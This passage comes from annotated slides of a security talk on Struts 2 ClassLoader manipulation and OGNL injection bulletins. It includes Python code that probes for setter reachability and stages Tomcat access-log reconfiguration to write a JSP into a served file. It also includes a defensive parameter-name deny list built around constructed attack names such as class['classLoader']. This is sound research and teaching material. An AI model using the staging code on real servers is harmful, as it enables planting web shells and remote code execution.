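    """Is `param` wired to an int setter somewhere down the getter chain?

    Three requests are compared with a baseline that carries no parameter:
    MAX_VALUE converts fine, MAX_VALUE + 1 and 'AAAAAAAAA' do not. When only
    the last two responses differ from the baseline, the value is being
    converted to a Java int, i.e. the chain reaches a setter. Assumption:
    the conversion error is observable (status or body); with some action
    configurations it is swallowed and the probe says nothing (returns None
    when even the valid value changes the response).
    """
    baseline = send("GET", action_path, {})
    ok = send("GET", action_path, {param: str(INT_MAX)})
    overflow = send("GET", action_path, {param: str(INT_MAX + 1)})
    junk = send("GET", action_path, {param: "AAAAAAAAA"})
    if ok != baseline:
        return None
    return overflow != baseline and junk != baseline


def accesslog_stage(chain, directory, file_prefix, suffix, date_format, jsp):
    """Parameters for slide 22's four steps plus the two follow-up paths.

    Returns (params, trigger_path, shell_path). With fileDateFormat='1' the
    valve's date stamp is the literal '1', so the file is prefix + '1' +
    suffix and the stamp never changes again. My reading of the valve: the
    new stamp differs from the old date, which makes it rotate and reopen
    the file under the new directory/prefix/suffix. A SimpleDateFormat
    pattern letter in date_format would put a date into the name instead,
    so those are rejected.
    """
    if re.search(r"[A-Za-z]", date_format):
        raise ValueError("date_format must not contain pattern letters")
    params = setter_params(chain, directory=directory, prefix=file_prefix,
                           suffix=suffix, fileDateFormat=date_format)
    filename = f"{file_prefix}{date_format}{suffix}"
    # The request line is logged as sent (%r in the common pattern), so the
    # JSP goes into the path un-encoded. Recent Tomcat releases reject '<'
    # and '>' in the request target, which closes this delivery route.
    trigger_path = "/" + jsp
    return params, trigger_path, "/" + filename


class FakeServer:
    """Constructed stand-in for a Struts 2 action used by the test. When
    `reachable` is set, a cacheMaxSize parameter is converted to a Java int
    and a conversion error yields a different response."""

    def __init__(self, reachable):
        self.reachable = reachable

    def __call__(self, method, path, params):
        for name, value in params.items():
            if self.reachable and name.endswith(".cacheMaxSize"):
                if not re.fullmatch(r"-?\d+", value) or not -2**31 <= int(value) <= INT_MAX:
                    return (200, "INPUT result: field error for cacheMaxSize")
        return (200, "Hello World")
```

The trigger request is deliberately a nonexistent URL, as on slide 22: the 404 is irrelevant, the valve logs the request line anyway, and the whole log line (client address, timestamp, quoted request line) becomes template text of the JSP around the code you put in the path. A harmless `<%= 7*191 %>` is enough to confirm evaluation before anything heavier is staged.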
• 35. OK I see, but…

• 36. Previous security bulletins
  – RCE: when form validation fails, field values are interpreted as OGNL
  – RCE: bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL
  – RCE: bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL; the S2-003 fix was incomplete
  – RCE: user input is evaluated as OGNL when there is a conversion error
  – Several RCEs: via ExceptionDelegator (same as S2-007), CookieInterceptor (same idea as S2-003 and S2-005), etc.
  – RCE: incomplete fix for S2-003 and S2-005 on ParametersInterceptor

• 37. Previous security bulletins
  – RCE: incomplete fix for S2-003, S2-005 and S2-009 on ParametersInterceptor when using values for redirections
  – RCE: the s:url and s:a tags, when "includeParams" is set, allow evaluating the values of request parameters as OGNL
  – RCE: same as S2-013, incomplete fix
  – RCE: actions using wildcards and double OGNL evaluation allow OGNL injection
  – RCE: DefaultActionMapper short-circuit navigation interpreted as OGNL
  – RCE: what we saw in this presentation ☺ (ParametersInterceptor)
  – RCE: incomplete fix for S2-020
  – Incomplete fix for S2-020 and S2-021
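Added example, not from the deck and not Struts' own code: a parameter-name deny list of the kind ParametersInterceptor applies through excludeParams, and of the kind the Struts 1 workaround filter from slide 21 applies in front of BeanUtils. The two pattern sets are mine, written to show why the first fix for S2-020 was followed by S2-021: a pattern that only knows the dotted spelling lets through the bracket and capitalised spellings that OGNL also resolves to getClass(). The real bulletin patterns differ in detail; take them from the bulletins, not from here.

```python
import re

# First attempt: block 'class.' at the start of the name or after a dot.
DOTTED_ONLY = [r"(.*\.|^)class\..*"]

# What a tighter list has to cover as well: class['x'], class["x"], Class.x
# and 'class' as the last segment. (?i) makes the match case-insensitive.
ALL_SPELLINGS = [r"(?i)(.*\.|^|.*\[['\"])class(\.|\[|\]|['\"]\]|$).*"]

# Constructed parameter names an attacker might try; 'username' is legitimate.
ATTEMPTS = [
    "username",
    "class.classLoader.x",
    "class['classLoader'].x",
    'class["classLoader"].x',
    "Class.classLoader.x",
    "user.class.classLoader.x",
]


def is_excluded(patterns, name):
    """Java's Matcher.matches() matches the whole string, so use fullmatch.
    Porting such a list with re.search changes what the anchors mean."""
    return any(re.fullmatch(p, name) for p in patterns)


def filter_params(patterns, params):
    """Split request parameters into the ones that may reach bean
    population and the ones the deny list removed. Struts 2 silently drops
    excluded names; a front filter for Struts 1 would rather reject the
    whole request when `excluded` is non-empty."""
    accepted, excluded = {}, []
    for name, value in params.items():
        if is_excluded(patterns, name):
            excluded.append(name)
        else:
            accepted[name] = value
    return accepted, excluded


def compare():
    """Which of the attempts each pattern set lets through."""
    return {
        "dotted_only": [n for n in ATTEMPTS if not is_excluded(DOTTED_ONLY, n)],
        "all_spellings": [n for n in ATTEMPTS if not is_excluded(ALL_SPELLINGS, n)],
    }
```

compare() is the whole argument in one call: the dotted-only list stops the exact string from the advisory and nothing else, while the second list leaves only the legitimate name. A deny list on names is still a deny list; Struts later moved to accepting only names that match a tight allow pattern, which is the direction to take in any similar bean-population code.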
• 39. Conclusions?
  – Seven years between S2-001 and S2-020
  – Same kind of vulnerabilities: injecting OGNL from user-supplied data
  – Several bypasses for fixes
  – Almost all RCE
  – Take your own…

• 40. Bonus track - Confluence
  – It is based on a WebWork fork (older than Struts 2)
  – If you look at their bulletins:
    – Versions up to and including 5.5.1 are vulnerable to ClassLoader manipulation
      https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-05-21
    – Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluation
      https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2015-01-21
  – Don't they look familiar? ☺

• 41. Bonus track - Confluence

• 42. Questions?
  – You can also ask:
    – Poke me around
    – By twitter: @julianvilas

• 43. Questions?
  – And what do you think about OGNL?
  Thanks for attending!!! ☺